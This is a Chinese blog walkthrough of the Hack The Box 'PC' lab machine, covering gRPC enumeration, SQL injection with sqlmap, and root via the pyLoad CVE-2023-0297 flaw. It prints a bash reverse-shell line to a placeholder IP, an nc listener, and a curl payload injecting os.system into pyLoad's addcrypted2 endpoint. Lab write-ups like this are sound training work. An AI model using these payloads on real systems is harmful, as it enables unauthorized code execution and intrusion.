HTB hackthebox PC WP 黑这个盒子pc靶机通关记录

最新推荐文章于 2024-04-18 10:00:00 发布
最新推荐文章于 2024-04-18 10:00:00 发布
阅读量516 收藏
点赞数 1
分类专栏: htb记录 one htb 文章标签: 安全性测试 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44203305/article/details/131493214
版权

 

攻击机ip:10.10.16.63

靶机ip:10.10.11.214

 

50051端口用的grpc

 

GitHub - fullstorydev/grpcui: An interactive web UI for gRPC, along the lines of postman

利用grpcui连接服务器(grpcui要求go环境)

执行后弹出ui页面

这个界面可以用admin;admin请求数据且会返回我们token和id

 然后利用getinfo尝试得到返回数据

 

 

 

 猜测id参数会成为突破口,上sqlmap

 

然后ssh

拿到user.txt

提权

跑linpeas.sh信息搜集

漫长的寻找...................................................................................

 发现服务器存在pyload文件

 

找day!

pyLoad js2py Python Execution

https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad

CVE-2023–0297

未经身份验证的攻击者可以向 flash/addcrypted2 端点发出精心设计的 POST 请求,以利用该请求执行代码

用day!

先在靶机创建/tmp/bash.sh:

#!/bin/bash

Bash -i >& /dev/tcp/yourip/yourport 0>&1

攻击机开启监听:

Nc -lnvp xxxx

再在靶机执行:

curl -i -s -k -X $'POST' \

    --data-binary $'jk=pyimport%20os;os.system(\"bash%20/tmp/bash.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \

$'http://<target>/flash/addcrypted2'

Bang!

 

 

newrldluv
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hack the Box——Templated (ssti) wp
maple's的博客
01-22 2862
0x00前言 刚做完第一题的我,立马打开了第二题 提示:Can you exploit this simple mistake?(您可以利用这个简单的错误吗?) 0x01访问网站 http://178.128.40.217:31440/ 从界面提示Proudly powered by Flask/Jinja2,首先盲猜是ssti漏洞 根据以往的经验首先找注入点 0x02 注入点 url尝试payload ?={{3*3}} 从这里明确是ssti漏洞,也找的注入点..
Hack the Box——Wafwaf(代码审计) wp
maple's的博客
01-23 499
0x00前言 又开始了一天的学习之路打开了我的Hack the Box Wafwaf 提示:My classmate Jason made this small and super secure note taking application, check it out!(我的同学Jason制作了这个小型且超级安全的笔记记录应用程序,请查看!) 0x01访问网站 访问界面,简单明了,直接给了源码 http://167.99.88.216:30957/ 显然就是代码审计了 简单看下代码
pyLoad远程代码执行漏洞(CVE-2023-0297)复现以及原理流量特征分析
最新发布
m0_59598029的博客
04-18 1023
pyLoad是一个用 Python 编写的免费和开源下载管理器,可用于NAS、下一代路由器、无头家庭服务器以及任何能够连接到互联网并支持 Python编程语言的设备。pyLoad 存在代码注入漏洞,未经身份验证的攻击者可以通过滥用 js2py 功能执行任意 Python 代码。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
新版HackTheBox做题记录WP
midi
04-19 3149
HTB(Hack the box)做题笔记WP Challenges:Web{Emdee five for life、Templated、Phonebook、FreeLancer、Gunship、Weather App} ,MISC{misDIRection、Blackhole、Eternal Loop、Longbottom's Locker、Canvas}
HackTheBox-Intelligence WP
h1nt的博客
10-19 2932
0x01 端口探测 使用nmap对靶机进行探测: nmap -sV -sC 10.10.10.248 比较标准的DC端口,还多了个WEB的80。 0x02 user.txt 进WEB看看,发现在主页目录可以下载文档。主页能下载的文档文件名为2020-01-01-upload.pdf 遂写了脚本进行爆破,将所有的文档下载下来: import requests for month in range(1, 13): for day in range(1, 32):
HackTheBox-Driver WP
h1nt的博客
10-25 503
目前机器还没退休,等retired了丢出来 想要hint也可以滴滴我
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
HTB-writeups:此仓库包含HackTheBox的文章
05-01
这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBoxHTB)的挑战和机器的解决过程记录HackTheBox是一个在线平台,允许安全专家和爱好者通过解决各种虚拟机来提升他们的渗透测试技能。"Writeups...
hackthebox-writeups:HacktheBox'boot2root'计算机的编写
05-12
hackthebox撰写HacktheBox计算机(boot2root)的文章和用西班牙语或英语编写的挑战。有关密码保护的重要说明直到2020年3月的机器写入都受到相应的根标志的保护。 但是自此日期以来,HTB标志是动态的,并且对于每个...
HackTheBox:只是我在做HackTheBox时的个人记录
04-03
哈克盒子HTB难度等级和顺序排序机器简单 :端口445 Netbios Samba用户名映射脚本命令执行:MS08_067 NetAPI远程执行代码漏洞:通过FTP上传的ASPX反向Shell(IIS) :端口443 VTigerCRM(Elastix)本地文件包含LFI...
hackthebox:HTB 机器和 InfoSec 社区的笔记
08-04
盒子 HTB机注意事项将定期更新,旨在解开所有可能的方式并准备考试还有更多待更新创建和维护: cyberwr3nch内容向无国界医生说不!这个不断地从5月3日更新RD 2020感谢造访菜鸟cyberwr3nch :wrench: TCSC Learn and...
HackTheBox——openadmin wp
a1054756335的博客
05-04 905
openamin今天在HTB下线了,所以趁着下线且还能访问的空档赶紧写个WP记录、回顾、找不足 1.信息收集: root@kali:~/HTB/Openadmin# nmap -F 10.10.10.171 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 16:26 CST Nmap scan report for 10.10.10.1...
HackTheBox-Monitors WP
h1nt的博客
10-23 2831
0x01 端口探测 使用nmap对靶机端口进行探测: nmap -sC -sV -v 10.10.10.238 发现只有两个端口是开着的: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e
HackTheBox-Previse WP
h1nt的博客
09-07 530
0x01 信息收集 端口信息: 目录扫描: 0x02 打靶 在之前的收集信息中,可以发现有很多存在的页面,但是由于重定向跳回了login.php进行登录验证。 我们使用burp可以渲染页面,可以看到很多页面是有有用的信息的。 账户注册界面: 服务器状态浏览界面: 在文件浏览界面可以发现网站的源码: 也可以发现下载的链接,但是访问会跳回login.php进行登录验证,无奈只能先注册账户。 访问一开始的accounts.php,同时让burp拦截响应,将响应包状态码修改成2
hackthebox - TartarSauce (考点:信息搜集/wp漏洞)(未完成)
冬萍子癸水
04-15 421
nmap 就一个80,里面一张酸酸乳样的照片 然后打开robots.txt,看到webservices似乎有很多料,点看看看未发现太多 同时,扫目录也发现了webservices 继续深挖,扫webservices里面还有啥。 看到wp。wordpress的简称 看到wp就要想到用wpscan扫他 wpscan --url http://10.10.10.88/webservices/wp ...
hackthebox - Blocky (考点:wordpress & jad java class反编译 &密码重复利用& linux基本提权知识)
冬萍子癸水
05-13 485
1 扫描 21想到ftp进去找文件,22可能有ssh登录,80进web搜集信息 C:\root> nmap -A 10.10.10.37 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 05:34 EDT Nmap scan report for 10.10.10.37 Host is up (0.26s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSI
Hack The Box -----------------------Waldo
大方子
12-16 1323
这次的靶机是Hachthebox靶机 IP地址为:10.10.10.87 ================================================================================================ 先用Nmap对目标机器进行扫描  nmap  -sV 10.10.10.87 -sT -o hawk.txt 然后我...
hackthebox】【Dab】
大方子
02-03 2302
====================================================================================== 靶机的IP:10.10.10.86    信息的获取 用Nmap进行扫描 nmap -sC -T5 10.10.10.86   发现靶机开启了80,22,21,8080端口 我们先访问下80端口 ...
hackthebox Mailroom Hard难度 抄wp复现
qq_29060627的博客
04-30 2673
如上得知: 密码库的密码是:
hackthebox
09-11
Hack The Box (HTB) 是一个在线的渗透测试和网络安全训练平台。它提供了一系列虚拟机,供用户尝试攻击和入侵。用户可以通过解决一系列的密码学、网络、应用程序等挑战来增强他们的渗透测试技能。HTB 的目标是帮助用户了解真实世界中的网络漏洞和攻击技术,并提供一个安全的环境来进行学习和实践。 请注意,使用 Hack The Box 平台进行未经授权的攻击是违法的。这个平台仅用于合法的学习和研究目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值